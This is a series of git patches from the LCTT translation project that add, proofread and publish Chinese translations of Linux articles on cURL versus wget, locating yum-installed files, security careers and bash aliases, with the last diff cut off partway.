+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 7951246949aefca138ada511192fc0877e96cf19 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Mon, 8 Jan 2018 18:46:59 +0800
Subject: [PATCH 174/371] Delete 20180102 cURL vs. wget- Their Differences,
Usage and Which One You Should Use.md
---
...ces, Usage and Which One You Should Use.md | 61 -------------------
1 file changed, 61 deletions(-)
delete mode 100644 sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
diff --git a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md b/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
deleted file mode 100644
index 1ffeac62bc..0000000000
--- a/sources/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
+++ /dev/null
@@ -1,61 +0,0 @@
-translating by CYLeft
-
-cURL vs. wget: Their Differences, Usage and Which One You Should Use
-======
-![](https://www.maketecheasier.com/assets/uploads/2017/12/wgc-feat.jpg)
-
-For downloading files directly from the Linux command line, there are two utilities that immediately come to mind: `wget` and `cURL`. They share a lot of features and can easily get many of the same tasks accomplished.
-
-Though they share similar features, they aren't exactly the same. These programs fit slightly different roles and use cases, and do have traits that make each better for certain situations.
-
-### cURL vs wget: Their Similarities
-
-Both wget and cURL can download things. At their core, that's what they both do. They can make requests of the Internet and pull back the requested item. That could be a file, picture, or even the raw HTML of a website.
-
-Both programs are also capable of making HTTP POST requests. This means they can send data to a website, like filling out a form.
-
-Since both are command line tools, they were also both designed to be scriptable. You can include both wget and cURL in your [Bash scripts][1] to automatically interact with online content and retrieve what you need.
-
-### wget Advantages
-
-![wget download][2]
-
-wget is simple and straightforward. It's meant for quick downloads, and it's excellent at it. wget is a single self-contained program. It doesn't require any extra libraries, and it's not meant to do anything beyond the scope of what it does.
-
-Because wget is so tailored for straight downloads, it also has the ability to download recursively. That allows you to download everything on a page or all of the files in an FTP directory at once.
-
-wget also has intelligent defaults. It specifies how to handle a lot of things that a normal browser would, like cookies and redirects, without the need to add any configuration. Lastly, wget works out of the box.
-
-### cURL Advantages
-
-![cURL Download][3]
-
-cURL is a multi-tool. Sure, it can download content from the Internet. It can do a lot more, too.
-
-cURL is powered by a library: libcurl. This means you can write entire programs based on cURL, allowing you to base graphical download pograms on libcurl and get access to all of its functionality.
-
-The wide range or protocols that cURL supports are probably the biggest selling point it has. cURL can access websites over HTTP and HTTPS and can handle FTP in both directions. It supports LDAP and even Samba shares. You can actually use cURL to send and retrieve email.
-
-cURL has some neat security features, too. cURL supports loads of SSL/TLS libraries. It also supports Internet access via proxies, including SOCKS. That means you can use cURL over Tor.
-
-cURL also supports gzip compression to send large amounts of data more easily.
-
-### Closing Thoughts
-So should you use cURL or wget? That really depends. If you want to download something quickly without needing to worry about flags, then you should go with wget. It's simple and just works. If you want to do something more complex, cURL should be your immediate choice.
-
-cURL allows you to do a lot more. You can think of cURL like a stripped-down command line web browser. It supports just about every protocol you can think of and can access and interact with nearly all online content. The only is that a browser renders the responses that it receives, and cURL doesn't.
-
---------------------------------------------------------------------------------
-
-via: https://www.maketecheasier.com/curl-vs-wget/
-
-作者:[Nick Congleton][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.maketecheasier.com/author/nickcongleton/
-[1]:https://www.maketecheasier.com/beginners-guide-scripting-linux/
-[2]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-wget.jpg (wget download)
-[3]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-curl.jpg (cURL Download)
From 35d04b915b6c82ba501e8ee3ae800f3e3b3208f1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 18:47:40 +0800
Subject: [PATCH 175/371] PUB:20171229 Set Ubuntu Derivatives Back to Default
with Resetter.md
@stevenzdg988 https://linux.cn/article-9217-1.html
---
...171229 Set Ubuntu Derivatives Back to Default with Resetter.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md (100%)
diff --git a/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md b/published/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
similarity index 100%
rename from translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
rename to published/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
From 0b41933d389fb964d113afbba121c20d15267bee Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Mon, 8 Jan 2018 18:48:25 +0800
Subject: [PATCH 176/371] translated done cURL vs. wget
20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
---
...ces, Usage and Which One You Should Use.md | 60 +++++++++++++++++++
1 file changed, 60 insertions(+)
create mode 100644 translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
diff --git a/translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md b/translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
new file mode 100644
index 0000000000..d3f55b8f61
--- /dev/null
+++ b/translated/tech/20180102 cURL vs. wget- Their Differences, Usage and Which One You Should Use.md
@@ -0,0 +1,60 @@
+cURL VS wget:根据两者的差异和使用习惯,你应该选用哪一个?
+======
+![](https://www.maketecheasier.com/assets/uploads/2017/12/wgc-feat.jpg)
+
+当想要直接通过 Linux 命令行下载文件,马上就能想到两个工具:‘wget’和‘cURL’。它们有很多共享的特征,可以很轻易的完成一些相同的任务。
+
+虽然它们有一些相似的特征,但它们并不是完全一样。这两个程序适用与不同的场合,在特定场合下,都拥有各自的特性。
+
+### cURL vs wget: 相似之处
+
+wget 和 cURL 都可以下载内容。它们的内核就是这么设计的。它们都可以向互联网发送请求并返回请求项。这可以是文件、图片或者是其他诸如网站的原始 HTML 之类。
+
+这两个程序都可以进行 HTTP POST 请求。这意味着它们都可以向网站发送数据,比如说填充表单什么的。
+
+由于这两者都是命令行工具,它们都被设计成脚本程序。wget 和 cURL 都可以写进你的 [Bash 脚本][1] ,自动与新内容交互,下载所需内容。
+
+### wget 的优势
+
+![wget download][2]
+
+wget 简单直接。这意味着你能享受它超凡的下载速度。wget 是一个独立的程序,无需额外的资源库,更不会做出格的事情。
+
+wget 是专业的直接下载程序,支持递归下载。同时,它也允许你在网页或是 FTP 目录下载任何事物。
+
+wget 拥有智能的默认项。他规定了很多在常规浏览器里的事物处理方式,比如 cookies 和重定向,这都不需要额外的配置。可以说,wget 简直就是无需说明,开罐即食!
+
+### cURL 优势
+
+![cURL Download][3]
+
+cURL是一个多功能工具。当然,他可以下载网络内容,但同时它也能做更多别的事情。
+
+cURL 技术支持库是:libcurl。这就意味着你可以基于 cURL 编写整个程序,允许你在 libcurl 库中基于图形环境下载程序,访问它所有的功能。
+
+cURL 宽泛的网络协议支持可能是其最大的卖点。cURL 支持访问 HTTP 和 HTTPS 协议,能够处理 FTP 传送。它支持 LDAP 协议,甚至支持 Samba 分享。实际上,你还可以用 cURL 收发邮件。
+
+cURL 也有一些简洁的安全特性。cURL 支持安装许多 SSL/TLS 库,也支持通过网络代理访问,包括 SOCKS。这意味着,你可以越过 Tor. 使用cURL。
+
+cURL 同样支持让数据发送变得更容易的 gzip 压缩技术。
+
+### 思考总结
+
+那你应该使用 cURL 还是使用 wget?这个比较得看实际用途。如果你想快速下载并且没有担心参数标识的需求,那你应该使用轻便有效的 wget。如果你想做一些更复杂的使用,直觉告诉你,你应该选择 cRUL。
+
+cURL 支持你做很多事情。你可以把 cURL想象成一个精简的命令行网页浏览器。它支持几乎你能想到的所有协议,可以交互访问几乎所有在线内容。唯一和浏览器不同的是,cURL 不能显示接收到的相应信息。
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/curl-vs-wget/
+
+作者:[Nick Congleton][a]
+译者:[译者ID](https://github.com/CYLeft)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/nickcongleton/
+[1]:https://www.maketecheasier.com/beginners-guide-scripting-linux/
+[2]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-wget.jpg (wget download)
+[3]:https://www.maketecheasier.com/assets/uploads/2017/12/wgc-curl.jpg (cURL Download)
From 37b1920456247da451a6a3fb699068ce65bab528 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 19:03:45 +0800
Subject: [PATCH 177/371] PRF:20180105 yum find out path where is package
installed to on CentOS-RHEL.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@cyleung 翻译时要尽量忠实原文。
---
... is package installed to on CentOS-RHEL.md | 57 ++++++++++---------
1 file changed, 30 insertions(+), 27 deletions(-)
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index 770b2cbe05..82708ab2a7 100644
--- a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -1,35 +1,34 @@
-在 CentOS/RHEL 上查找 yum 安裝软件的位置
+在 CentOS/RHEL 上查找 yum 安裝的软件的位置
======
-我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
+**我已经在 CentOS/RHEL 上[安装了 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到 yum 软件包安装的目录呢?**
-[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
+[yum 命令][2] 是可交互的、基于 rpm 的 CentOS/RHEL 的开源软件包管理工具。它会帮助你自动地完成以下操作:
- 1. 操作系统内核更新
- 2. 软件包更新
- 3. 安装新的软件包
- 4. 删除旧的软件包
- 5. 查找已安装和可用的软件包
+1. 核心系统文件更新
+2. 软件包更新
+3. 安装新的软件包
+4. 删除旧的软件包
+5. 查找已安装和可用的软件包
-和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
+和 `yum` 相似的软件包管理工具有: [apt-get 命令][3] 和 [apt 命令][4]。
### yum 安装软件包的位置
-我们以安装 htop 为例:
+处于演示的目的,我们以下列命令安装 `htop`:
```
# yum install htop
```
-
-使用以下命令列出 yum 安装 htop 的文件:
+要列出名为 htop 的 yum 软件包安装的文件,运行下列 `rpm` 命令:
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
-输出例子:
+示例输出:
```
/usr/bin/htop
@@ -40,18 +39,17 @@
/usr/share/doc/htop-2.0.2/README
/usr/share/man/man1/htop.1.gz
/usr/share/pixmaps/htop.png
-
```
-### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
+### 如何使用 repoquery 命令查看由 yum 软件包安装的文件位置
-首先使用 [yum 命令][2] 安装 yum-utils 软件包:
+首先使用 [yum 命令][2] 安装 yum-utils 软件包:
```
# yum install yum-utils
```
-例子输出:
+示例输出:
```
Resolving Dependencies
@@ -110,20 +108,25 @@ Complete!
### 如何列出通过 yum 安装的命令?
-使用 repoquery 命令:
+现在可以使用 `repoquery` 命令:
-`# repoquery --list htop`
+```
+# repoquery --list htop
+```
-或者
+或者:
-`# repoquery -l htop`
+```
+# repoquery -l htop
+```
-例子输出:
+示例输出:
[![yum where is package installed][5]][5]
-你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
+*使用 repoquery 命令确定 yum 包安装的路径*
+你也可以使用 `type` 命令或者 `command` 命令查找指定二进制文件的位置,例如 `httpd` 或者 `htop` :
```
$ type -a httpd
@@ -133,15 +136,15 @@ $ command -V htop
### 关于作者
-作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
+作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6]、 [Facebook][7]、 [Google+][8]。
--------------------------------------------------------------------------------
via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
-作者:[][a]
-译者:[译者 ID](https://github.com/cyleung)
-校对:[校对者 ID](https://github.com/ 校对者 ID)
+作者:[cyberciti][a]
+译者:[cyleung](https://github.com/cyleung)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
From 0f6ad9fd1bbb1632a7c4000b1bfd9cca20476c99 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 19:04:57 +0800
Subject: [PATCH 178/371] PUB: 20180105 yum find out path where is package
installed to on CentOS-RHEL.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@cyleung 恭喜你,完成了第一篇翻译(虽然这是第二篇啦),文章发布地址:
https://linux.cn/article-9218-1.html
你的 LCTT 专页地址: https://linux.cn/lctt/cyleung
---
... find out path where is package installed to on CentOS-RHEL.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20180105 yum find out path where is package installed to on CentOS-RHEL.md (100%)
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/published/20180105 yum find out path where is package installed to on CentOS-RHEL.md
similarity index 100%
rename from translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
rename to published/20180105 yum find out path where is package installed to on CentOS-RHEL.md
From 7cee12cb53dd39404a5ebed960769ab366fd6e51 Mon Sep 17 00:00:00 2001
From: Torival
Date: Mon, 8 Jan 2018 19:58:39 +0800
Subject: [PATCH 179/371] Update 20171005 python-hwinfo - Display Summary Of
Hardware Information In Linux.md
Translating by Torival
---
...hwinfo - Display Summary Of Hardware Information In Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
index f92c52f3cf..e066269efb 100644
--- a/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
+++ b/sources/tech/20171005 python-hwinfo - Display Summary Of Hardware Information In Linux.md
@@ -1,4 +1,4 @@
-python-hwinfo : Display Summary Of Hardware Information In Linux
+Translating by Torival python-hwinfo : Display Summary Of Hardware Information In Linux
======
Till the date, we have covered most of the utilities which discover Linux system hardware information & configuration but still there are plenty of commands available for the same purpose.
From ee119c4888a5c8a0a22975974b3dafe2b7d1cab9 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 22:14:42 +0800
Subject: [PATCH 180/371] PRF&PUB:20171115 Security Jobs Are Hot Get Trained
and Get Noticed.md
@geekpi
---
...obs Are Hot Get Trained and Get Noticed.md | 59 +++++++++++++++++++
...obs Are Hot Get Trained and Get Noticed.md | 58 ------------------
2 files changed, 59 insertions(+), 58 deletions(-)
create mode 100644 published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
delete mode 100644 translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
diff --git a/published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
new file mode 100644
index 0000000000..459d6f3f4f
--- /dev/null
+++ b/published/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
@@ -0,0 +1,59 @@
+安全专家的需求正在快速增长
+============================================================
+
+![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
+
+> 来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。
+
+对安全专业人员的需求是真实的。在 [Dice.com][4] 多达 75,000 个职位中,有 15% 是安全职位。[福布斯][6] 称:“根据网络安全数据工具 [CyberSeek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但感兴趣的程度还较低。
+
+### 安全是要关注的领域
+
+根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为商机。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。
+
+事实上,如果你有兴趣成为商业领导者,那么安全是要关注的领域 —— 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司带来优势。
+
+### 无所畏惧
+
+分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的 [Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。
+
+在安全方面从未有过更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 —— 数据泄露、系统故障和欺诈。安全团队正在不断变化,快节奏的环境中工作。真正的挑战在于在保持甚至改进最终用户体验的同时,积极主动地进行安全性,发现和消除漏洞。
+
+### 增长即将来临
+
+在技术的任何方面,安全将继续与云一起成长。企业越来越多地转向云计算,这暴露出比组织里比过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。
+
+条例也在不断完善 —— 个人身份信息(PII)越来越广泛。许多公司都发现他们必须投资安全来保持合规,避免成为头条新闻。由于面临巨额罚款,声誉受损以及行政工作安全,公司开始越来越多地为安全工具和人员安排越来越多的预算。
+
+### 培训和支持
+
+即使你不选择一个专门的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是可以的,但我建议结合培训、指导和不断的实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。
+
+对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 —— 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。
+
+### 游戏最后
+
+越来越多的公司正在投资安全性,并试图填补他们的技术团队的开放角色。如果你对管理感兴趣,那么安全是值得关注的地方。执行层领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。
+
+明智地实施和有战略思想的安全是受到关注的。安全对高管和消费者之类至关重要 —— 我鼓励任何对安全感兴趣的人进行培训和贡献。
+
+_现在[下载][2]完整的 2017 年开源工作报告_
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
+
+作者:[BEN COLLEN][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/bencollen
+[1]:https://www.linux.com/licenses/category/used-permission
+[2]:http://bit.ly/2017OSSjobsreport
+[3]:https://www.linux.com/files/images/security-skillspng
+[4]:http://www.dice.com/
+[5]:http://cyberseek.org/index.html#about
+[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
+[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
diff --git a/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
deleted file mode 100644
index 5834271731..0000000000
--- a/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md
+++ /dev/null
@@ -1,58 +0,0 @@
-安全工作热门:受到培训并获得注意
-============================================================
-
-![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills")
-来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。[经许可使用][1]
-
-对安全专业人员的需求是真实的。在 [Dice.com][4] 中,超过 75,000 个职位中有 15% 是安全职位。[Forbes][6] 中称:“根据网络安全数据工具 [CyberSeek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但兴趣水平还很低。
-
-### 安全是要关注的领域
-
-根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为利基。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。
-
-事实上,如果你有兴趣领先于商业领导者,那么安全是要关注的领域 - 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司优势。
-
-### 无所畏惧
-
-分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的[ Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。
-
-在安全方面从未有过更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 - 数据泄露、系统故障和欺诈。安全团队正在不断变化,快节奏的环境中工作。真正的挑战在于在保持甚至改进最终用户体验的同时,积极主动地进行安全性,发现和消除漏洞。
-
-### 增长即将来临
-
-在技术的任何方面,安全将继续与云一起成长。企业越来越多地转向云计算,这暴露出比组织过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。
-
-条例也在不断完善 - 个人身份信息(PII)越来越广泛。许多公司都发现他们必须投资安全来保持合规,避免成为头条新闻。由于面临巨额罚款,声誉受损以及行政工作安全,公司开始越来越多地为安全工具和人员安排越来越多的预算。
-
-### 培训和支持
-
-即使你不选择一个特定的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是鼓励的,但我建议结合培训、指导和不断实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。
-
-对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 - 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。
-
-### 游戏最后
-
-越来越多的公司正在投资安全性,并试图填补他们的技术团队的开放角色。如果你对管理感兴趣,那么安全是值得关注的地方。执行领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。
-
-明治地实施和有战略思想的安全是受到关注的。安全对高管和消费者之类至关重要 - 我鼓励任何对安全感兴趣的人进行培训和贡献。
-
- _现在[下载][2]完整的 2017 年开源工作报告_
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed
-
-作者:[ BEN COLLEN][a]
-译者:[geekpi](https://github.com/geekpi)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/bencollen
-[1]:https://www.linux.com/licenses/category/used-permission
-[2]:http://bit.ly/2017OSSjobsreport
-[3]:https://www.linux.com/files/images/security-skillspng
-[4]:http://www.dice.com/
-[5]:http://cyberseek.org/index.html#about
-[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163
-[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/
From c6a426a6b456afebfdad3d4118e738c51aed3a6b Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 22:36:47 +0800
Subject: [PATCH 181/371] translate done: 20120611 30 Handy Bash Shell Aliases
For Linux - Unix - Mac OS X.md
---
...ell Aliases For Linux - Unix - Mac OS X.md | 227 +++++++++---------
1 file changed, 112 insertions(+), 115 deletions(-)
rename {sources => translated}/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md (55%)
diff --git a/sources/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md b/translated/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
similarity index 55%
rename from sources/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
rename to translated/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
index 4b37c62558..d637c92858 100644
--- a/sources/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
+++ b/translated/tech/20120611 30 Handy Bash Shell Aliases For Linux - Unix - Mac OS X.md
@@ -1,20 +1,22 @@
-translating by lujun9972
-30 Handy Bash Shell Aliases For Linux / Unix / Mac OS X
+Linux / Unix / Mac OS X 中的 30 个方便的 Bash shell 别名
======
-An bash alias is nothing but the shortcut to commands. The alias command allows the user to launch any command or group of commands (including options and filenames) by entering a single word. Use alias command to display a list of all defined aliases. You can add user-defined aliases to [~/.bashrc][1] file. You can cut down typing time with these aliases, work smartly, and increase productivity at the command prompt.
+bash 别名不是把别的,只不过是指向命令的快捷方式而已。`alias` 命令允许用户只输入一个单词就运行任意一个命令或一组命令(包括命令选项和文件名)。执行 `alias` 命令会显示一个所有已定义别名的列表。你可以在 [~/.bashrc][1] 文件中自定义别名。使用别名可以在命令行中减少输入的时间,使工作更流畅,同时增加生产率。
-This post shows how to create and use aliases including 30 practical examples of bash shell aliases.
-[![30 Useful Bash Shell Aliase For Linux/Unix Users][2]][2]
+本文通过 30 个 bash shell 别名的实际案例演示了如何创建和使用别名。
-## More about bash alias
+![30 Useful Bash Shell Aliase For Linux/Unix Users][2]
-The general syntax for the alias command for the bash shell is as follows:
+## bash alias 的那些事
-### How to list bash aliases
+bash shell 中的 alias 命令的语法是这样的:
-Type the following [alias command][3]:
-`alias`
-Sample outputs:
+### 如何列出 bash 别名
+
+输入下面的 [alias 命令 ][3]:
+```
+alias
+```
+结果为:
```
alias ..='cd ..'
alias amazonbackup='s3backup'
@@ -23,11 +25,11 @@ alias apt-get='sudo apt-get'
```
-By default alias command shows a list of aliases that are defined for the current user.
+默认 alias 命令会列出当前用户定义好的别名。
-### How to define or create a bash shell alias
+### 如何定义或者说创建一个 bash shell 别名
-To [create the alias][4] use the following syntax:
+使用下面语法 [创建别名 ][4]:
```
alias name =value
alias name = 'command'
@@ -36,22 +38,19 @@ alias name = '/path/to/script'
alias name = '/path/to/script.pl arg1'
```
-alias name=value alias name='command' alias name='command arg1 arg2' alias name='/path/to/script' alias name='/path/to/script.pl arg1'
-
-In this example, create the alias **c** for the commonly used clear command, which clears the screen, by typing the following command and then pressing the ENTER key:
+举个例子,输入下面命令并回车就会为常用的 `clear`( 清除屏幕)命令创建一个别名 **c**:
```
alias c = 'clear'
```
-
-Then, to clear the screen, instead of typing clear, you would only have to type the letter 'c' and press the [ENTER] key:
+然后输入字母 `c` 而不是 `clear` 后回车就会清除屏幕了:
```
c
```
-### How to disable a bash alias temporarily
+### 如何临时性地禁用 bash 别名
-An [alias can be disabled temporarily][5] using the following syntax:
+下面语法可以[临时性地禁用别名 ][5]:
```
## path/to/full/command
/usr/bin/clear
@@ -61,37 +60,37 @@ An [alias can be disabled temporarily][5] using the following syntax:
command ls
```
-### How to delete/remove a bash alias
+### 如何删除 bash 别名
-You need to use the command [called unalias to remove aliases][6]. Its syntax is as follows:
+使用 [unalias 命令来删除别名 ][6]。其语法为:
```
unalias aliasname
unalias foo
```
-In this example, remove the alias c which was created in an earlier example:
+例如,删除我们之前创建的别名 `c`:
```
unalias c
```
-You also need to delete the alias from the [~/.bashrc file][1] using a text editor (see next section).
+你还需要用文本编辑器删掉 [~/.bashrc 文件 ][1] 中的别名定义(参见下一部分内容)。
-The alias c remains in effect only during the current login session. Once you logs out or reboot the system the alias c will be gone. To avoid this problem, add alias to your [~/.bashrc file][1], enter:
+### 如何让 bash shell 别名永久生效
+
+别名 `c` 在当前登录会话中依然有效。但当你登出或重启系统后,别名 `c` 就没有了。为了防止出现这个问题,将别名定义写入 [~/.bashrc file][1] 中,输入:
```
vi ~/.bashrc
```
-
-
-The alias c for the current user can be made permanent by entering the following line:
+输入下行内容让别名 `c` 对当前用户永久有效:
```
alias c = 'clear'
```
-Save and close the file. System-wide aliases (i.e. aliases for all users) can be put in the /etc/bashrc file. Please note that the alias command is built into a various shells including ksh, tcsh/csh, ash, bash and others.
+保存并关闭文件就行了。系统级的别名(也就是对所有用户都生效的别名) 可以放在 `/etc/bashrc` 文件中。请注意,alias 命令内建于各种 shell 中,包括 ksh,tcsh/csh,ash,bash 以及其他 shell。
-### A note about privileged access
+### 关于特权权限判断
-You can add code as follows in ~/.bashrc:
+可以将下面代码加入 `~/.bashrc`:
```
# if user is not root, pass all commands via sudo #
if [ $UID -ne 0 ]; then
@@ -100,9 +99,9 @@ if [ $UID -ne 0 ]; then
fi
```
